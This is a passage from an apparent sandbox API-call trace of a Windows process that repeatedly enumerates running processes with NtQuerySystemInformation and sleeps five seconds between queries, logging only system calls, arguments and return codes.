Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.816] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.830] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.830] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.835] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.840] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.841] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.841] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.844] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.845] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.855] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.855] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.856] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.856] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.856] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.858] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.859] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.871] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.871] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.872] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.872] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.873] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.876] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.877] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.886] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.887] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.887] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.888] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.888] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.890] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.891] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.903] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.903] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.904] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.904] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.907] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.907] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.918] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.918] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.919] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.919] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.921] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.922] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.933] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.934] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.934] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.934] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.935] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.937] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.938] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.949] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.949] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.950] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.950] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.950] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.953] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.964] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.965] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.966] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.966] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.968] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.969] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.980] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.980] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.981] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.981] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.981] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.984] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0119.985] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0119.996] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0119.996] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0119.996] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0119.997] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0119.997] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0119.999] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.000] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.012] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.013] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.013] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.014] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.016] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.017] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.027] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.027] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.028] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.028] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.028] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.031] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.031] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.044] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.044] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.047] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.062] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.062] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.074] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.077] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.078] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.090] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.093] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.105] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.105] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.106] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.106] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.106] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.109] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.109] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.124] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.125] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.136] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0120.136] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0120.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0120.137] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0120.137] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0120.140] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0120.141] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0120.153] 